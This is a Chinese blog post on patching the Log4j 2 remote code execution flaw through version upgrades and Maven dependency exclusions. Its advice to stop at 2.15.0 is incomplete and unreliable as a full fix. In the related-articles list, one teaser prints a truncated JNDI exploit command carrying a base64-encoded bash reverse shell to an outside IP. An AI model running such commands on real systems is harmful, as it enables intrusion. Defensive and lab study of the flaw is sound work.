Apache Log4j 2 漏洞

最新推荐文章于 2024-03-08 15:43:00 发布
最新推荐文章于 2024-03-08 15:43:00 发布
阅读量405 收藏
点赞数 3
文章标签: apache java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tryHelloboy/article/details/121863002
版权

在这里插入图片描述

查看项目的pom.xml文件中是否存 版本号小于2.15.0 则存在该漏洞。
解决办法:
1.
建议升级为2.15.0-rc2版本
下载地址:
github:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

gitee:https://gitee.com/faith-v/logging-log4j2/releases/log4j-2.15.0-rc2

2.
如果项目没有使用log4j 而是别的jar依赖自动导入的可以在pom中加以下配置排除

		    <exclusions>
		    <exclusion>
		      <groupId>org.apache.logging.log4j</groupId>
		      <artifactId>log4j-api</artifactId>
		    </exclusion>
		    <exclusion>
		      <groupId>org.apache.logging.log4j</groupId>
		      <artifactId>log4j-core</artifactId>
		    </exclusion>
		    <exclusion>
		      <groupId>log4j</groupId>
		      <artifactId>log4j</artifactId>
		    </exclusion>
		  </exclusions>

例如:排除阿里云schedulerx2中的log4j

	<!-- 分布式2.0-->
	<dependency>
		<groupId>com.aliyun.schedulerx</groupId>
		<artifactId>schedulerx2-worker</artifactId>
		<version>1.3.0.3</version>
	    <exclusions>
	    <exclusion>
	      <groupId>org.apache.logging.log4j</groupId>
	      <artifactId>log4j-api</artifactId>
	    </exclusion>
	    <exclusion>
	      <groupId>org.apache.logging.log4j</groupId>
	      <artifactId>log4j-core</artifactId>
	    </exclusion>
	    <exclusion>
	      <groupId>log4j</groupId>
	      <artifactId>log4j</artifactId>
	    </exclusion>
	  </exclusions>			
	</dependency>

2021-12-13 补充:
log4j 2.15.0 已正式已发布,可以在项目中直接引入
maven地址:https://mvnrepository.com/

	<dependency>
	    <groupId>org.apache.logging.log4j</groupId>
	    <artifactId>log4j-core</artifactId>
	    <version>2.15.0</version>
	</dependency>		
	<dependency>
	    <groupId>org.apache.logging.log4j</groupId>
	    <artifactId>log4j-api</artifactId>
	    <version>2.15.0</version>
	</dependency>
LuckyDog9527
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Apache Log4j2(远程代码执行漏洞
F2444790591的博客
07-08 7789
1、下载、解压、重命名vulhub-master.zip为vulhub 2、进入漏洞环境下,启动该环境。 3、访问目标靶场: 4、在Dnslog.cn中生成接收信息的域名 。 5、提交dnslog payload 参数,进行访问。 6、可以发现dnslog接收到返回的信息,证明存在log4
Apache log4j2漏洞
m0_63645854的博客
06-13 551
本文介绍了log4j2的远程代码执行漏洞
log4j2 远程代码执行漏洞复现(CVE-2021-44228)
最新发布
Welcome To Myon'Blog !
03-08 2634
log4jApache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
Apache Log4j2 漏洞原理
m0_49025459的博客
06-26 1702
Apache Log4j被发现存在一处任意代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。经验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等众多组件与大型应用均受影响。
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
Apache log4j漏洞总结
星落的博客
08-02 3179
Apache log4j漏洞总结包括CVE-2017-5645(Log4j反序列化漏洞)和CVE-2021-44228(Log4j 2远程代码执行漏洞)
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
apache-log4j-2.16.0-bin.rar
12-17
开源日志框架Apache Log4j2远程代码执行漏洞升级包
ApacheLog4j_Win.zip
01-05
ApacheLog4j漏洞验证工具
JAVA安全--log4j漏洞研究分析
goddemon
03-12 9436
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
Apache Log4j2 漏洞详谈
infosec的博客
12-16 5751
源于Apache Log4j2这个漏洞的描述很多,也有很多的解法。开这个博的目的就是想分析一下漏洞具体是如何被利用的,这个大黑锅下面都有哪些坑。 最近由阿里安全团队爆出来的Apache Log4j2漏洞,可以说是霸占了大部分网安人的朋友圈。同时一张热图也被传来传去,就是下面这个图片。 由于Apache Log4j2组件应用的普及性,导致了大部分的应用都受到波及。同时我们也需要知道并不是所有的log功能都是通过Apache Log4j2来实现的,其实我们还有很多选择。众所周知Log4j2是Apache 家的
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 3468
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Log4j 1.2.X反序列化漏洞(CVE-2019-17571)
weixin_44047654的博客
12-11 1376
Apache Log4j 1.2.X反序列化漏洞(CVE-2019-17571)
Apache Log4j2漏洞复现
weixin_51151498的博客
01-23 1336
Apache Log4j2漏洞
apache log4j漏洞复现
热门推荐
Shanfenglan's blog
12-10 5万+
文章目录1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)利用条件利用2. CVE-2019-17571利用条件利用3. apache log4j rce利用条件环境搭建利用 1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 利用条件
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2152
Apache log4jApache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
apache log4j2 漏洞复现
06-28
Apache Log4j2漏洞是一种远程代码执行漏洞,攻击者可以利用该漏洞在受影响的服务器上执行任意代码。攻击者可以通过构造特定的请求,将恶意代码注入到受影响的服务器上,从而实现远程代码执行。该漏洞已被广泛利用,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值